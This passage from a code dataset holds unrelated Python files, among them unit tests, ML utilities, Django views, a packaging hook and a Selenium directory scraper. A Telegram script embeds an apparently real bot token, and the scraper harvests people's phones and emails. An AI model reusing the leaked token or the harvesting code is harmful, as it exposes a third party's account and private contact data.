эта функция уже проверена.\r\n num=0\r\n for i in show_middle_salary_list(S.orchestras_list, average_salaries_list):\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"срзп\"] == average_salaries_list[num][0])\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"id\"] == \"(id = \" + str(average_salaries_list[num][1]) + \")\")\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"название\"] == S.orchestras_list[average_salaries_list[num][1]].show(False))\r\n num+=1\r\n print(\"Ok\", end=\"\")\r\n\r\n#Проверка функции, возвращающей дирижеров из списка:\r\nclass Test_of_return_conductors(TestCase):\r\n def test_check(self):\r\n print(\"\\nПроверка функции, возвращающей дирижеров из списка: \", end=\"\")\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n ids_list = []\r\n\r\n #Получаем все id дирижеров, проходя по списку:\r\n for i in S.conductors_list:\r\n ids_list.append(i.conductor_id)\r\n\r\n #Проверяем их наличие:\r\n for i in return_conductors(S, ids_list):\r\n Test_of_return_conductors.assertIn(self, i, S.conductors_list)\r\n print(\"Оk\", end=\"\")\r\n\r\n#Проверка функции поиска слова в оркестре:\r\nclass Test_of_word_in_orchestra_search(TestCase):\r\n def test_check(self, times=100):\r\n print(\"\\nПроверка функции поиска слова в оркестре: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 5, 8, 10000, 1000000)\r\n word = S.get_rand_name(1, 1)\r\n #Проверка правильности:\r\n num1 = 0\r\n for i in word_in_orchestra_search(S.orchestras_list, S.conductors_list, S.orchestras_dict, word):\r\n Test_of_word_in_orchestra_search.assertIn(self, word, i.name)\r\n num1+=1\r\n\r\n #Проверка того, что найдено все:\r\n num2 = 0\r\n for i in range(len(S.orchestras_list)):\r\n if word in S.orchestras_list[i].name:\r\n num2+=1\r\n Test_of_word_in_orchestra_search.assertTrue(self, num1==num2)\r\n print(\"Оk\", end=\"\")\r\n\r\n#Проверка функции поиска дирижера по первой букве:\r\nclass Test_of_check_conductures_first_letter(TestCase):\r\n def test_check(self, times=10):\r\n print(\"\\nПроверка функции поиска дирижера по первой букве: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n letter = S.get_rand_name(1, 1)\r\n\r\n #Проверка правильности:\r\n num1 = 0\r\n for i in check_conductures_first_letter(S.conductors_list, S.orchestras_list, letter):\r\n Test_of_check_conductures_first_letter.assertTrue(self, i[\"фамилия\"][0]==letter)\r\n num1+=1\r\n\r\n #Проверка того, что найдено все:\r\n num2 = 0\r\n for i in S.conductors_list:\r\n if i.sername[0] == letter: \r\n num2 += 1\r\n Test_of_check_conductures_first_letter.assertTrue(self, num1==num2)\r\n print(\"Ok\", end=\"\")","sub_path":"Rk2/Rk2_Classes.py","file_name":"Rk2_Classes.py","file_ext":"py","file_size_in_byte":11310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83522380","text":"import re\n\nlog_file = \"./logs/retinanet_shapes.log\"\nregex_ = \"[0-9]+, [0-9]+, [0-9]+, [0-9]+\"\n\nFOR_ONE_IMG = True\n\nwith open(log_file, 'r') as f:\n logs = f.readlines()\n\n\ndef estimate_act_map_sizes(logs, DATA):\n tensor_els = 0\n how_many_720 = 0\n\n for idx, log in enumerate(logs):\n\n matches = re.findall(regex_, log)\n\n if len(matches)>0:\n match = matches[0]\n else:\n continue\n\n match = [int(m) for m in match.split(',')]\n print(match)\n\n n, c, h, w = match\n\n if c==720:\n how_many_720 += 1\n if DATA==\"LVIS\":\n c *= 15.375\n\n if FOR_ONE_IMG:\n n = 1\n\n tensor_size = int(n*c*h*w)\n\n tensor_els += tensor_size\n\n\n return (tensor_els*4/1000000)\n #print(\"Activations take: {} MBs\".format(tensor_els*4/1000000))\n\nprint(\"COCO: {:.2f} MBs.\".format(estimate_act_map_sizes(logs, DATA=\"COCO\")))\nprint(\"LVIS: {:.2f} MBs.\".format(estimate_act_map_sizes(logs, DATA=\"LVIS\")))\n\n\n","sub_path":"sandbox/shapes/v0/estimate_act_map_sizes.py","file_name":"estimate_act_map_sizes.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623146295","text":"import tensorflow.compat.v1 as tf\nimport mesh_tensorflow as mtf\n\ndef comparative_paired_rewards_loss(paired_rewards, ans_pair_dim):\n \"\"\"\n Loss function for the comparative reward model from Learning to Summarize\n from Human Feedback (Stiennon et al.).\n\n Parameters\n ----------\n paired_rewards : mtf.Tensor\n Output of the reward model for two responses to the same prompt (e.g.\n two summaries of the same text). The second value along the\n `ans_pair_dim` axis is assumed to correspond to the human preferred\n response. Shape should be [ans_pair_dim, batch_dim].\n ans_pair_dim : mtf.Dimension\n Dimension of the answer pair. ans_pair_dim.size = 2\n\n Returns\n -------\n loss : mtf.Tensor\n Aggregative mini-batch loss with shape [].\n \"\"\"\n tf_diff_filter = tf.convert_to_tensor([-1, 1], dtype=paired_rewards.dtype)\n diff_filter = mtf.import_tf_tensor(\n paired_rewards.mesh,\n tf_diff_filter,\n shape=[ans_pair_dim]\n )\n diff = mtf.reduce_sum(paired_rewards * diff_filter, reduced_dim=ans_pair_dim)\n return mtf.reduce_mean(-mtf.log(mtf.sigmoid(diff)))\n","sub_path":"reward/comparative/loss_fn.py","file_name":"loss_fn.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"608247499","text":"# coding: utf-8\nfrom __future__ import absolute_import, unicode_literals, division, print_function\n\n\nimport requests\nURL = 'https://api.telegram.org/bot'\nTOKEN = '419867054:AAHDaorcrkdV_4IyAb2PJWu4gftAlmOXW2o'\n# data = {'offset': offset 1, 'limit': 0, 'timeout': 0}\nwhile True:\n # message_data = { # формируем информацию для отправки сообщения\n # 'chat_id': update['message']['chat']['id'], # куда отправляем сообщение\n # 'text': \"I'm bot\", # само сообщение для отправки\n # 'reply_to_message_id': update['message']['message_id'], # если параметр указан, то бот отправит сообщение в reply\n # 'parse_mode': 'HTML' # про форматирование текста ниже\n # }\n ans = requests.post(URL+TOKEN+'/getUpdates',) # запрос на отправку сообщения\n print(ans.json())\n\n\n f = {u'ok': True, u'result': [{u'message': {u'date': 1511383949, u'text': u'hduedhue', u'from': {u'username': u'uladzislaugr', u'first_name': u'Vladislav', u'last_name': u'Graevkiy', u'is_bot': False, u'language_code': u'en', u'id': 161222966}, u'message_id': 14, u'chat': {u'username': u'uladzislaugr', u'first_name': u'Vladislav', u'last_name': u'Graevkiy', u'type': u'private', u'id': 161222966}}, u'update_id': 365666766}]}\n\n message_data = { # формируем информацию для отправки сообщения\n 'chat_id': f['result'][0]['message']['chat']['id'], # куда отправляем сообщение\n 'text': \"I'm bot\", # само сообщение для отправки\n # 'reply_to_message_id': f['result'][0]['message']['message_id'], # если параметр указан, то бот отправит сообщение в reply\n 'parse_mode': 'HTML' # про форматирование текста ниже\n }\n try:\n request = requests.post(URL+TOKEN+'/sendMessage', data=message_data) # запрос на отправку сообщения\n except:\n print('Send message error')\n\n print(request.json())\n","sub_path":"housebot/housemain.py","file_name":"housemain.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417884454","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 16:56:48 2018\n\n@author: owen\n\"\"\"\n\n# Merge two given sorted integer array A and B into a new sorted integer array.\n\n# 归并到一个新数组\n# 如果一个数组非常大,则用二分查找把小的数组插进去\n\nclass Solution:\n \"\"\"\n @param A: sorted integer array A\n @param B: sorted integer array B\n @return: A new sorted integer array\n \"\"\"\n def mergeSortedArray(self, A, B):\n # write your code here\n # time O(m + n)\n m, n = len(A), len(B) # m ~ n\n i, j = 0, 0 \n res = []\n while i < m and j < n:\n if A[i] < B[j]:\n res.append(A[i])\n i += 1\n else:\n res.append(B[j])\n j += 1\n \n while i < m: # 数组要把剩余的复制过去\n res.append(A[i])\n i += 1\n \n while j < n:\n res.append(B[j])\n j += 1\n \n return res\n \n \nfrom bisect import bisect_right\nclass Solution:\n \"\"\"\n @param A: sorted integer array A\n @param B: sorted integer array B\n @return: A new sorted integer array\n \"\"\"\n def mergeSortedArray(self, A, B):\n # write your code here\n # if one array is very large and the other is very small, time O(n + m log n), space O(1), can be better than directly comparing two elements\n m, n = len(A), len(B)\n if m > n:\n return self.mergeSortedArray(B, A)\n \n start = 0 \n res = []\n for x in A: # number of A is much smaller than that of B\n pos = bisect_right(B, x) # find the index > x for inserting x\n res += B[start: pos] # directly copy from B\n res.append(x) # add element of A\n start = pos\n \n res += B[start:] \n return res\n\n\n","sub_path":"Merge Two Sorted Array.py","file_name":"Merge Two Sorted Array.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273928352","text":"import requests\nfrom datetime import datetime\nimport time\nimport xml.dom.minidom as xml\nimport json\n\n\nURL = 'http://192.168.8.1/'\nSTATUS_API = 'api/monitoring/status'\nTRAFFIC_API = 'api/monitoring/traffic-statistics'\nSESSION_ID = 'd3roljPTGZmVu1pfF00ckSXih4JZNjxtM6eDhvCFhHPB6XtTju33Bifi0TN1imX1TZ6Kf1YaqHt3x1D3JgSgGTVIZPeRA8XmPXsR0BMy00Tk0rJrqvDxw0pJZIQ0aANb'\n\nif __name__ == '__main__':\n s = requests.Session()\n s.headers.update({})\n s.cookies.update({'SessionID': SESSION_ID})\n\n while True:\n resp = s.get(URL + TRAFFIC_API)\n \n if resp.ok:\n \n doc = xml.parseString(resp.text)\n\n total_upload = int(doc.getElementsByTagName('TotalUpload')[0].firstChild.nodeValue)\n total_download = int(doc.getElementsByTagName('TotalDownload')[0].firstChild.nodeValue)\n\n print(datetime.now().strftime('%I:%M:%S%p'))\n if len(str(total_download)) >= 7:\n ttotal_download = total_download/1024/1024\n ttotal_upload = total_upload/1024/1024\n print(f'Total Upload: {ttotal_upload:.2f}MB\\nTotal Download: {ttotal_download:.2f}MB')\n elif len(str(total_download)) >= 4: \n ttotal_download = total_download/1024\n ttotal_upload = total_upload/1024\n print(f'Total Upload: {ttotal_upload:.2f}KB\\nTotal Download: {ttotal_download:.2f}KB')\n else:\n print(f'Total Upload: {total_upload} byte\\nTotal Download: {total_download} byte')\n \n with open('traffic_stat.log', 'at+') as f:\n f.write(f\"{datetime.now()}:{total_upload}:{total_download}\\n\")\n else:\n print(\"Please Change Session ID\")\n SESSION_ID = input()\n continue\n print('*'*64)\n time.sleep(60)\n\n\n","sub_path":"Requests/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439158668","text":"import requests\n\n\nclass URLShortener:\n def __init__(self, logger):\n self.logger = logger\n\n self.api_01 = 'https://cleanuri.com/api/v1/shorten'\n self.api_02 = 'https://rel.ink/api/links/'\n\n def shorten_url(self, url):\n data = {\n 'url': url\n }\n\n response = requests.post(self.api_01, data=data)\n\n if response.status_code == 200:\n self.logger.info(response.json())\n return response.json()['result_url']\n\n self.logger.error(response.json())\n response = requests.post(self.api_02, json=data)\n\n if response.status_code == 201:\n self.logger.info(response.json())\n return 'https://rel.ink/'.format(response['hashid'])\n\n self.logger.error(response.json())\n\n return None\n","sub_path":"tema3/url_shortener.py","file_name":"url_shortener.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"566670156","text":"strsample = \"\"\"\r\n\r\nWhen you are old and grey and full of sleep, \r\nAnd nodding by the fire,take down this book,\r\nAnd slowly read,and dream of the soft look.\r\nYour eyes had once,and of their shadows deep; \r\nHow many loved your moments of glad grace,\r\nAnd loved your beauty with love false or true,\r\nBut one man loved the pilgrim Soul in you,\r\nAnd loved the sorrows of your changing face; \r\nAnd bending down beside the glowing bars,\r\nMurmur,a little sadly,how Love fled ,\r\nAnd paced upon the mountains overhead ,\r\nAnd hid his face amid a crowd of stars.\r\n\r\n\"\"\"\r\n#编制程序,统计26个字母出现的次数,并按照次数由高到低将字母排序\r\n#注:大写和小写算一个字符,如H和h算一个,统计在一起\r\n# 本题的输出应为:\r\n'''\r\ne 43\r\no 43\r\na 35\r\nd 35\r\nn 30\r\nr 22\r\nl 22\r\ns 19\r\nt 19\r\nh 18\r\ni 17\r\nu 15\r\ny 13\r\nf 13\r\nw 11\r\ng 10\r\nm 10\r\nb 7\r\nc 7\r\nv 7\r\np 5\r\nk 3'''\r\n\r\nalpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\ncount = []\r\n##请将代码写在下面\r\ndef cnt(text:str):\r\n text = text.lower()\r\n for i in range(26):\r\n count.append(0)\r\n for x in text:\r\n if x == alpha[i]:\r\n count[i] += 1\r\n for i in range(25):\r\n for j in range(25):\r\n if count[j] < count[j+1]:\r\n count[j], count[j+1] = count[j+1], count[j]\r\n alpha[j], alpha[j+1] = alpha[j+1], alpha[j]\r\n for i in range(26):\r\n if count[i] != 0:\r\n print(alpha[i], count[i])\r\n \r\ncnt(strsample)\r\n\r\n\r\n","sub_path":"Homework/Midterm/0000000_02.py","file_name":"0000000_02.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137314859","text":"from django.urls import path\nfrom studentApi import views\n\nurlpatterns = [\n path(\"students/\", views.StudentList.as_view()),\n path(\"students/\", views.StudentDetail.as_view()),\n path(\"createStudent/\", views.CreateStudent.as_view()),\n path(\"updateStudent/\", views.UpdateStudent.as_view()),\n path(\"deleteStudent/\", views.DeleteStudent.as_view())\n]","sub_path":"studentApi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644868563","text":"from ex06_cliente import Cliente\r\nfrom ex06 import ContaCorrente\r\n\r\nclass Programa:\r\n \r\n def __init__(self):\r\n self.contaCorrente = ContaCorrente(Cliente, )\r\n\r\n def main(self):\r\n\r\n terminar = False\r\n\r\n while not terminar:\r\n comando = input('Digite \"1\" para verificar o saldo atual da conta, \"2\" para depositar, \"3\" para sacar, \"4\" para transferir e \"0\" para sair:\\n')\r\n comando = int(comando)\r\n\r\n if comando == 1: self.contaCorrente.saldo_final()\r\n elif comando == 2: self.contaCorrente.deposito()\r\n elif comando == 3: self.contaCorrente.saque()\r\n elif comando == 4: self.contaCorrente.transferencia()\r\n elif comando == 0: terminar = True\r\n else: print('comando inválido')\r\n\r\nPrograma().main()","sub_path":"Lets_code/Lógica_de_programação_orientada_a_objetos/Aula_08/ex06_programa.py","file_name":"ex06_programa.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178139618","text":"\"\"\"The main shortcut methods for interacting with the Google Cloud DNS API.\"\"\"\n\nfrom gcloud.credentials import Credentials\nfrom gcloud.dns.connection import Connection\n\n#: Version of this package.\n__version__ = '0.1'\n\n#: Auth scope used for DNS.\nDNS_SCOPE = 'https://www.googleapis.com/auth/ndev.clouddns.readwrite'\n\n\ndef get_connection(project, email, private_key_path, scopes=None):\n \"\"\"Shortcut for establishing a connection with Cloud DNS.\n\n :type project: string\n :param project: The name of the project to connect to.\n\n :type client_email: string\n :param client_email: The e-mail attached to the service account.\n\n :type private_key_path: string\n :param private_key_path: The path to a private key file (this file was\n given to you when you created the service\n account).\n\n :rtype: :class:`gcloud.dns.connection.Connection`\n :returns: A connection defined with the proper credentials.\n \"\"\"\n scopes = scopes or DNS_SCOPE\n credentials = Credentials.get_for_service_account(\n email, private_key_path, scopes)\n return Connection(credentials=credentials, project=project)\n\n\ndef get_zone(zone, project, email, private_key_path):\n \"\"\"Shortcut for fetching a managed zone from Cloud DNS.\n\n If you already have a zone, this function will likely be your quickest entry\n point.\n\n :type zone: string\n :param zone: The name of the managed zone to fetch.\n\n :type project: string\n :param project: The name of the project to connect to.\n\n :type client_email: string\n :param client_email: The e-mail attached to the service account.\n\n :type private_key_path: string\n :param private_key_path: The path to a private key file (this file was\n given to you when you created the service\n account).\n\n :rtype: :class:`gcloud.dns.resources.Zone`\n :returns: A connection defined with the proper credentials.\n \"\"\"\n connection = get_connection(project, email, private_key_path)\n return connection.get_zone(zone)\n\n","sub_path":"gcloud/dns/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267809808","text":"\"\"\"\nScript to convert Collections CSV file to OCL-formatted JSON\n\"\"\"\nfrom csv_to_json_flex import ocl_csv_to_json_flex\n\ncsv_filename = 'dhis2datasets.csv'\noutput_filename = 'dhis2datasets.jsonl'\n\ncsv_resource_definitions = [\n {\n 'definition_name': 'DATIM-Collections',\n 'is_active': True,\n 'resource_type': 'Collection',\n 'id_column': 'OCL: Collection',\n 'skip_if_empty_column': 'OCL: Collection',\n ocl_csv_to_json_flex.DEF_CORE_FIELDS: [\n {'resource_field': 'owner', 'value': 'PEPFAR'},\n {'resource_field': 'owner_type', 'value': 'Organization'},\n {'resource_field': 'name', 'column': 'Dataset: shortname'},\n {'resource_field': 'full_name', 'column': 'Dataset: fullname'},\n {'resource_field': 'default_locale', 'value': 'en'},\n {'resource_field': 'supported_locales', 'value': 'en'},\n {'resource_field': 'short_code', 'column': 'OCL: Collection'},\n {'resource_field': 'collection_type', 'value': 'Subset'},\n {'resource_field': 'public_access', 'value': 'View'},\n {'resource_field': 'external_id', 'column': 'ZenDesk: Dataset'},\n ],\n ocl_csv_to_json_flex.DEF_KEY_VALUE_PAIRS: {\n 'extras': [\n {'key': 'Period', 'value_column': 'OCL: Period', 'omit_if_empty_value': True},\n {'key': 'DHIS2-Dataset-Code', 'value_column': 'Dataset: code', 'omit_if_empty_value': True},\n {'key_column': 'OCL: Active Sync Attribute', 'value': True}\n ]\n }\n },\n {\n 'definition_name': 'DATIM-CollectionVersions',\n 'is_active': True,\n 'resource_type': 'Collection Version',\n 'skip_if_empty_column': 'OCL: Collection',\n ocl_csv_to_json_flex.DEF_CORE_FIELDS: [\n {'resource_field': 'owner', 'value': 'PEPFAR'},\n {'resource_field': 'owner_type', 'value': 'Organization'},\n {'resource_field': 'collection', 'column': 'OCL: Collection'},\n {'resource_field': 'id', 'value': 'initial'},\n {'resource_field': 'description', 'value': 'Automatically generated empty repository version'},\n {'resource_field': 'released', 'value': True}\n ],\n },\n]\n\ncsv_converter = ocl_csv_to_json_flex(output_filename, csv_filename, csv_resource_definitions, verbose=0)\ncsv_converter.process_by_definition()\n","sub_path":"init/csv2json_dhis2datasets.py","file_name":"csv2json_dhis2datasets.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307324700","text":"from django.shortcuts import render, render_to_response\nfrom .models import Books\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom .forms import CreateForm\nfrom django.views.generic import CreateView, ListView, DetailView, TemplateView\nfrom django.views.generic.edit import UpdateView, DeleteView\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.template import Context\n\ndef index(request):\n if request.user.is_authenticated:\n return render(request,'books/index.html')\n else:\n return render_to_response('books/index.html')\n\ndef aboutus(request):\n if request.user.is_authenticated:\n return render(request,'books/aboutUs.html')\n else:\n return render_to_response('books/aboutUs.html')\n\ndef search(request):\n if request.user.is_authenticated:\n query_results = Books.objects.all().filter(genre__iexact = request.GET.get('g', '')).exclude(user_id = request.user.id)\n else:\n query_results = Books.objects.all().filter(genre__iexact = request.GET.get('g', ''))\n return render(request,'books/books_view.html',{'query_results':query_results})\n\ndef searchbox(request):\n if request.user.is_authenticated:\n query_results = Books.objects.all().filter(name__iexact = request.GET.get('key', '')).exclude(user_id = request.user.id)\n else:\n query_results = Books.objects.all().filter(name__iexact = request.GET.get('key', ''))\n return render(request,'books/books_view.html',{'query_results':query_results})\n\nclass BooksCreate(CreateView):\n form_class = CreateForm\n model = Books\n success_url = reverse_lazy('books_list')\n\n def get_form_kwargs(self):\n kwargs = super(BooksCreate, self).get_form_kwargs()\n kwargs.update({'request': self.request})\n return kwargs\n\n@method_decorator(login_required, name='dispatch') \nclass BooksList(ListView):\n model = Books\n context_object_name ='books'\n\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(BooksList, self).dispatch(*args, **kwargs)\n\ndef showbooks(request):\n if request.user.is_authenticated:\n query_results=Books.objects.all().exclude(user_id=request.user.id)\n else:\n query_results=Books.objects.all()\n return render(request, 'books/books_view.html',{'query_results':query_results})\n\nclass BooksView(DetailView):\n model = Books\n context_object_name ='books'\n\nclass BooksUpdate(UpdateView):\n model = Books\n fields = ['name', 'image', 'price', 'author', 'genre', 'isbn', 'edition', 'publisher', 'publishyear']\n success_url = reverse_lazy('books_list')\n\nclass BooksDelete(DeleteView):\n model = Books\n success_url = reverse_lazy('books_list')","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610968250","text":"from cbuild.core import logger, paths\nfrom cbuild.apk import create as apk_c, sign as apk_s\n\nimport glob\nimport time\nimport pathlib\nimport subprocess\n\n_hooks = [\n \"pre-install\", \"post-install\",\n \"pre-upgrade\", \"post-upgrade\",\n \"pre-deinstall\", \"post-deinstall\"\n]\n\ndef genpkg(\n pkg, repo, arch, binpkg, destdir = None, dbg = False\n):\n if not destdir:\n destdir = pkg.destdir\n\n if not destdir.is_dir():\n pkg.log_warn(f\"cannot find pkg destdir, skipping...\")\n return\n\n binpath = repo / binpkg\n lockpath = binpath.with_suffix(binpath.suffix + \".lock\")\n\n repo.mkdir(parents = True, exist_ok = True)\n\n while lockpath.is_file():\n pkg.log_warn(f\"binary package being created, waiting...\")\n time.sleep(1)\n\n try:\n lockpath.touch()\n\n metadata = {}\n args = []\n\n pkgdesc = pkg.pkgdesc\n if dbg:\n pkgdesc += \" (debug files)\"\n\n metadata[\"pkgdesc\"] = pkgdesc\n metadata[\"url\"] = pkg.rparent.url\n metadata[\"maintainer\"] = pkg.rparent.maintainer\n #metadata[\"packager\"] = pkg.rparent.maintainer\n metadata[\"origin\"] = pkg.rparent.pkgname\n metadata[\"license\"] = pkg.license\n\n if pkg.rparent.git_revision:\n metadata[\"commit\"] = pkg.rparent.git_revision + (\n \"-dirty\" if pkg.rparent.git_dirty else \"\"\n )\n\n if not dbg and len(pkg.provides) > 0:\n pkg.provides.sort()\n metadata[\"provides\"] = pkg.provides\n\n if pkg.provider_priority > 0:\n metadata[\"provider_priority\"] = pkg.provider_priority\n\n mdeps = []\n\n if not dbg:\n for c in pkg.depends:\n mdeps.append(c)\n else:\n mdeps.append(f\"{pkg.pkgname}={pkg.pkgver}-r{pkg.pkgrel}\")\n\n mdeps.sort()\n metadata[\"depends\"] = mdeps\n\n if not dbg:\n if hasattr(pkg, \"aso_provides\"):\n pkg.aso_provides.sort(key = lambda x: x[0])\n metadata[\"shlib_provides\"] = pkg.aso_provides\n\n if hasattr(pkg, \"so_requires\"):\n pkg.so_requires.sort()\n metadata[\"shlib_requires\"] = pkg.so_requires\n\n if hasattr(pkg, \"pc_provides\"):\n pkg.pc_provides.sort()\n metadata[\"pc_provides\"] = pkg.pc_provides\n\n if hasattr(pkg, \"cmd_provides\"):\n pkg.cmd_provides.sort()\n metadata[\"cmd_provides\"] = pkg.cmd_provides\n\n if hasattr(pkg, \"pc_requires\"):\n pkg.pc_requires.sort()\n metadata[\"pc_requires\"] = pkg.pc_requires\n\n mhooks = []\n for h in _hooks:\n hf = pkg.rparent.template_path / (pkg.pkgname + \".\" + h)\n if hf.is_file():\n mhooks.append((hf.resolve(), h))\n\n if len(mhooks) > 0:\n metadata[\"hooks\"] = mhooks\n\n if len(pkg.triggers) > 0:\n for t in pkg.triggers:\n p = pathlib.Path(t)\n if not p or not p.is_absolute():\n pkg.error(f\"invalid trigger path: {t}\")\n tp = pkg.rparent.template_path / (pkg.pkgname + \".trigger\")\n # if we have triggers, the script must exist\n if not tp.is_file():\n pkg.error(f\"trigger script does not exist\")\n # finally, write the metadata\n metadata[\"trigger\"] = tp.resolve()\n metadata[\"triggers\"] = list(pkg.triggers)\n\n logger.get().out(f\"Creating {binpkg} in repository {repo}...\")\n\n pkgname = pkg.pkgname\n if dbg:\n pkgname += \"-dbg\"\n\n apk_c.create(\n pkgname, f\"{pkg.pkgver}-r{pkg.pkgrel}\", arch,\n pkg.rparent.source_date_epoch, destdir, pkg.statedir, binpath,\n pkg.rparent.signing_key, metadata\n )\n finally:\n lockpath.unlink()\n\ndef invoke(pkg):\n arch = pkg.rparent.profile().arch\n binpkg = f\"{pkg.pkgname}-{pkg.pkgver}-r{pkg.pkgrel}.apk\"\n binpkg_dbg = f\"{pkg.pkgname}-dbg-{pkg.pkgver}-r{pkg.pkgrel}.apk\"\n\n repo = paths.repository() / pkg.rparent.repository\n\n if pkg.pkgname.endswith(\"-dbg\"):\n repo = repo / \"debug\"\n\n repo = repo / arch\n\n genpkg(pkg, repo, arch, binpkg)\n\n for sp in pkg.rparent.subpkg_list:\n if sp.pkgname == f\"{pkg.rparent.pkgname}-dbg\":\n # if there's an explicit subpkg for -dbg, don't autogenerate\n return\n\n dbgdest = pkg.rparent.destdir_base / f\"{pkg.pkgname}-dbg-{pkg.pkgver}\"\n\n # don't have a dbg destdir\n if not dbgdest.is_dir():\n return\n\n repo = paths.repository() / pkg.rparent.repository / \"debug\" / arch\n\n genpkg(pkg, repo, arch, binpkg_dbg, dbgdest, True)\n","sub_path":"src/cbuild/hooks/do_pkg/00_gen_apk.py","file_name":"00_gen_apk.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23730518","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom lxml import html\nimport csv\nimport time\nimport urllib.request\nimport random\nimport json, re\n\n\ndef parse_page(htmlstring, driver):\n print(\"--------------------START---------------------\")\n detail_Btns = driver.find_elements_by_xpath(\"//table[@class='rgMasterTable']/tbody//tr/td[1]\")\n \n for page in range(1, 238):\n if page >= 109:\n for i in range(1, len(detail_Btns) + 1):\n \n phone_data = {\n \"phone1\" : \"\",\n \"phone2\" : \"\",\n \"phone3\" : \"\",\n \"phone34\" : \"\"\n }\n\n email_data = {\n \"email1\" : \"\",\n \"email2\" : \"\",\n \"email3\" : \"\",\n \"email4\" : \"\"\n }\n \n last_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[2]\".format(i)).text \n \n first_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[3]\".format(i)).text\n \n company_name = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[4]\".format(i)).text\n \n city = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody/tr[{}]/td[5]\".format(i)).text\n \n detail_btn = driver.find_element_by_xpath(\"//table[@class='rgMasterTable']/tbody//tr[{}]/td[1]/a\".format(i))\n \n driver.execute_script(\"arguments[0].click();\", detail_btn)\n time.sleep(2)\n \n phones = re.findall(r'[(][\\d]{3}[)][ ]?[\\d]{3}-[\\d]{4}', driver.page_source)\n\n emails = re.findall(r'[\\w\\.-]+@[\\w\\.-]+', driver.page_source)\n \n for phone in range(1, len(phones) + 1):\n phone_data[\"phone{}\".format(phone)] = phones[phone - 1]\n \n for email in range(1, len(emails) + 1):\n if email % 2 == 1:\n email_data[\"email{}\".format(email)] = emails[email - 1]\n\n \n print(\"Last Name----------------------> : \", last_name)\n print(\"First Name---------------------> : \", first_name)\n print(\"Company Name-------------------> : \", company_name)\n print(\"City---------------------------> : \", city)\n print(\"Phone--------------------------> : \", phone_data)\n print(\"Email--------------------------> : \", email_data)\n \n with open(\"columbus.csv\", \"a\", newline=\"\", encoding='utf-8') as f:\n writer = csv.writer(f)\n writer.writerow([last_name, first_name, company_name, city, phone_data[\"phone1\"], phone_data[\"phone2\"], email_data[\"email1\"], email_data[\"email3\"]])\n \n back_btn = driver.find_element_by_id(\"ctl00_body_primary_body_1_ctl01_ucSearchResults_lkbBackToSearch\")\n \n driver.execute_script(\"arguments[0].click();\", back_btn)\n time.sleep(0.3)\n \n nextpage_Btn = driver.find_element_by_class_name(\"rgPageNext\")\n driver.execute_script(\"arguments[0].click();\", nextpage_Btn) \n time.sleep(0.3) \n \n\nif __name__ == \"__main__\":\n \n open('columbus.csv', 'wb').close()\n header = [\"Last Name\", \"First Name\", \"Company Name\", \"City\", \"Phone1\", \"Phone2\", \"Email1\", \"Email2\"]\n with open('columbus.csv', \"a\", 